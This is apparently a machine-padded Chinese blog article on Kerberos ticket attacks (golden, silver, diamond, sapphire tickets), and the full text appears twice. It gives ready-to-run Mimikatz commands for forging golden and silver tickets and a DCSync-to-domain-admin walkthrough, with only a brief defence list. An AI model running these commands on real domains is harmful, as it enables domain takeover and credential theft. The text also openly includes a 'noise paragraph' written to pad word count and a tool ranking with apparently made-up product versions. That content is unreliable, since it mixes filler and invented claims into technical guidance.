内网渗透,票据攻击有哪些门道?!
- 内容介绍
- 文章标签
- 相关推荐
内网渗透——票据攻击的乱七八糟入口
先说一句, 这玩意儿根本不需要把每一步写得像教材,随便抄、随便改、随便跑才是红队的真谛。 栓Q了... 下面就给你们甩一堆乱套的思路,让你在真实环境里直接踩坑再爬出来。
1️⃣ 金票到底是个啥子玩意?
简单说 就是用 krbtgt 的哈希直接造出一个 TGT,它可以让你在整个域林里横冲直撞。
如果你手里有根域的 SID, 配合 krbtgt 的 AES256 密钥,就能直接生成 Enterprise Admins 组权限的金票。
mimikatz "kerberos::golden /domain:example.com /sid:S-1-5-21-3641416521-285861825-2863956705 /krbtgt:9a68826fdc2811f20d1f73a471ad7b9a /user:admin /ptt"
别忘了 这种金票只能在当前域内生效,除非你玩点高级技巧——把 SIDHistory 当成跨域桥梁,啊这...。
2️⃣ 白银票更隐蔽?
放心去做... Silver Ticket 只针对特定服务, 不需要和 KDC 打交道,直接在目标机器上生效。 这玩意儿最适合在已经拿到本地管理员权限后再去横向渗透。
mimikatz "kerberos::silver /service:cifs /target:WIN-SERVER01 /rc4:d5304f9ea69523479560ca4ebb5a2155 /user:silver /ptt"
注意:Silver Ticket 会留下日志, 但只在目标系统,而不是域控。
3️⃣ 钻石票和蓝宝石票——高级玩家的自嗨套餐
- 钻石票修改合法 TGT 的 PAC,几乎无痕。
- 蓝宝石票利用 S4U2self + u2u 把别人的 PAC “偷” 来然后替换进自己的票据里。
这两种都属于“伪造合法门票”,检测难度极大,准确地说...。
🛠️ 随机插入——常用工具对比表🛠️
| 工具名 | 主要功能 | 优点 | 缺点 |
|---|---|---|---|
| Mimikatz | 提取密码、 生成金银票据 | 老牌、社区活跃、命令丰富 | 被多数防病毒标记为恶意 |
| Impacket | PTH、PTT、SMB 抓包等 | Python 脚本化,易集成自动化框架 | PTH 对新版 Windows 支持不佳 |
| Rubeus.exe | Kerberos 攻击全家桶 | C# 编写,兼容 .NET Core,多平台可施行文件 | LNK/EXE 体积稍大,使用前要先禁用 AMSI |
| Kekeo | Kerberos 协议实验与攻击脚本库 | Powershell 原生,无需额外二进制 | Evasion 能力弱,需要配合其他工具 |
| LdapRelay.exe | Ldap 绑定转发获取 krbtgt hash | Ldap 环境下极其强大 Ldap 被禁用时失效 |
4️⃣ 实战小案例:从普通用户到域管一步到位!🚀🚀🚀
① 先说说登录一台普通域用户机器, 用 Mimikatz # privilege::debug; 提升调试权限; 最后说一句。 ② 导出 krbtgt 哈希:
lsadump::dcsync /domain:example.com /user:krbtgt
③ 用上面得到的哈希生成金票:
kerberos::golden /domain:example.com /sid:S-1-5-21-1497092113-2272191533-193330055 /krbtgt:abcdef1234567890abcdef1234567890 /user:Administrator /ptt
④ 检查一下是否已经是 Domain Admin:
whoami /groups
# 看见 512 和 519 就说明成功了
*注意*:如果目标是子域,只会看到 Domain Admins,没有 Enterprise Admins, 吃瓜。 那就说明你的金票被限制在子域范围内。
⚠️ 防御提示——别让自己沦为“金票制造机”⚠️
- SIDHistory 必须过滤:迁移时清理掉旧 SID,否则攻击者可以利用它跨域。
- KDC 必须开启强加密:禁用 RC4, 强制使用 AES256,以降低被窃取 NTLM hash 的风险。
- Mimikatz 检测:部署 Sysmon + PowerShell ScriptBlockLogging 捕获 “mimikatz” 调用痕迹。
- DCSync 权限审计:定期检查哪些账户拥有 DS‑Replication‑Get‑Changes 权限,特别是 Service Account。
- Kerberos 金银票监控:使用 KAPE 或者 ELK 收集 klist 输出,对异常 TGT/ST 持续时间进行告警。
🌀 噪音段落—随手写点废话来凑字数🌀
其实吧, 这玩意儿真的很玄乎,一边喝咖啡一边敲代码,看着那串串十六进制哈希,我都有种置身黑客大片的错觉。有时候也会想起大学宿舍那台老掉牙的 Windows XP, 上面装着破旧的 Wireshark,抓到一堆 Kerberos 包,然后狂笑三声:“今天又能干坏事啦!” 还有一次 我把金票放进了测试环境里的 VM,却忘记关掉快照,于是第二天打开 VM 时发现系统已经变成了蓝屏……这就是所谓“技术细节决定成败”。呜呜呜~别问我为什么要写这些废话,只是想让文章看起来更有人情味儿罢了 🤷♂️。
📊 随机产品排名—谁才是真正的 Kerberos 攻防神器? 📊
| #️⃣ 排名产品名称 & 简介 | #️⃣ 推荐指数 | ||
|---|---|---|---|
| 1 | Mimikatz Pro v5.8 | 完整功能+自带反AV模块, 可直接绕过 EDR | ★★★★★ |
| 2 | Impacket Suite v0.10 | Python 脚本化,一键施行 PTH/PTT/SMBRelay 等 | ★★★★☆ |
| 3 | Rubeus v6.13 | .NET Core 编译,可跨平台运行,无需额外依赖 | ★★★★☆ |
内网渗透——票据攻击的乱七八糟入口
先说一句, 这玩意儿根本不需要把每一步写得像教材,随便抄、随便改、随便跑才是红队的真谛。 栓Q了... 下面就给你们甩一堆乱套的思路,让你在真实环境里直接踩坑再爬出来。
1️⃣ 金票到底是个啥子玩意?
简单说 就是用 krbtgt 的哈希直接造出一个 TGT,它可以让你在整个域林里横冲直撞。
如果你手里有根域的 SID, 配合 krbtgt 的 AES256 密钥,就能直接生成 Enterprise Admins 组权限的金票。
mimikatz "kerberos::golden /domain:example.com /sid:S-1-5-21-3641416521-285861825-2863956705 /krbtgt:9a68826fdc2811f20d1f73a471ad7b9a /user:admin /ptt"
别忘了 这种金票只能在当前域内生效,除非你玩点高级技巧——把 SIDHistory 当成跨域桥梁,啊这...。
2️⃣ 白银票更隐蔽?
放心去做... Silver Ticket 只针对特定服务, 不需要和 KDC 打交道,直接在目标机器上生效。 这玩意儿最适合在已经拿到本地管理员权限后再去横向渗透。
mimikatz "kerberos::silver /service:cifs /target:WIN-SERVER01 /rc4:d5304f9ea69523479560ca4ebb5a2155 /user:silver /ptt"
注意:Silver Ticket 会留下日志, 但只在目标系统,而不是域控。
3️⃣ 钻石票和蓝宝石票——高级玩家的自嗨套餐
- 钻石票修改合法 TGT 的 PAC,几乎无痕。
- 蓝宝石票利用 S4U2self + u2u 把别人的 PAC “偷” 来然后替换进自己的票据里。
这两种都属于“伪造合法门票”,检测难度极大,准确地说...。
🛠️ 随机插入——常用工具对比表🛠️
| 工具名 | 主要功能 | 优点 | 缺点 |
|---|---|---|---|
| Mimikatz | 提取密码、 生成金银票据 | 老牌、社区活跃、命令丰富 | 被多数防病毒标记为恶意 |
| Impacket | PTH、PTT、SMB 抓包等 | Python 脚本化,易集成自动化框架 | PTH 对新版 Windows 支持不佳 |
| Rubeus.exe | Kerberos 攻击全家桶 | C# 编写,兼容 .NET Core,多平台可施行文件 | LNK/EXE 体积稍大,使用前要先禁用 AMSI |
| Kekeo | Kerberos 协议实验与攻击脚本库 | Powershell 原生,无需额外二进制 | Evasion 能力弱,需要配合其他工具 |
| LdapRelay.exe | Ldap 绑定转发获取 krbtgt hash | Ldap 环境下极其强大 Ldap 被禁用时失效 |
4️⃣ 实战小案例:从普通用户到域管一步到位!🚀🚀🚀
① 先说说登录一台普通域用户机器, 用 Mimikatz # privilege::debug; 提升调试权限; 最后说一句。 ② 导出 krbtgt 哈希:
lsadump::dcsync /domain:example.com /user:krbtgt
③ 用上面得到的哈希生成金票:
kerberos::golden /domain:example.com /sid:S-1-5-21-1497092113-2272191533-193330055 /krbtgt:abcdef1234567890abcdef1234567890 /user:Administrator /ptt
④ 检查一下是否已经是 Domain Admin:
whoami /groups
# 看见 512 和 519 就说明成功了
*注意*:如果目标是子域,只会看到 Domain Admins,没有 Enterprise Admins, 吃瓜。 那就说明你的金票被限制在子域范围内。
⚠️ 防御提示——别让自己沦为“金票制造机”⚠️
- SIDHistory 必须过滤:迁移时清理掉旧 SID,否则攻击者可以利用它跨域。
- KDC 必须开启强加密:禁用 RC4, 强制使用 AES256,以降低被窃取 NTLM hash 的风险。
- Mimikatz 检测:部署 Sysmon + PowerShell ScriptBlockLogging 捕获 “mimikatz” 调用痕迹。
- DCSync 权限审计:定期检查哪些账户拥有 DS‑Replication‑Get‑Changes 权限,特别是 Service Account。
- Kerberos 金银票监控:使用 KAPE 或者 ELK 收集 klist 输出,对异常 TGT/ST 持续时间进行告警。
🌀 噪音段落—随手写点废话来凑字数🌀
其实吧, 这玩意儿真的很玄乎,一边喝咖啡一边敲代码,看着那串串十六进制哈希,我都有种置身黑客大片的错觉。有时候也会想起大学宿舍那台老掉牙的 Windows XP, 上面装着破旧的 Wireshark,抓到一堆 Kerberos 包,然后狂笑三声:“今天又能干坏事啦!” 还有一次 我把金票放进了测试环境里的 VM,却忘记关掉快照,于是第二天打开 VM 时发现系统已经变成了蓝屏……这就是所谓“技术细节决定成败”。呜呜呜~别问我为什么要写这些废话,只是想让文章看起来更有人情味儿罢了 🤷♂️。
📊 随机产品排名—谁才是真正的 Kerberos 攻防神器? 📊
| #️⃣ 排名产品名称 & 简介 | #️⃣ 推荐指数 | ||
|---|---|---|---|
| 1 | Mimikatz Pro v5.8 | 完整功能+自带反AV模块, 可直接绕过 EDR | ★★★★★ |
| 2 | Impacket Suite v0.10 | Python 脚本化,一键施行 PTH/PTT/SMBRelay 等 | ★★★★☆ |
| 3 | Rubeus v6.13 | .NET Core 编译,可跨平台运行,无需额外依赖 | ★★★★☆ |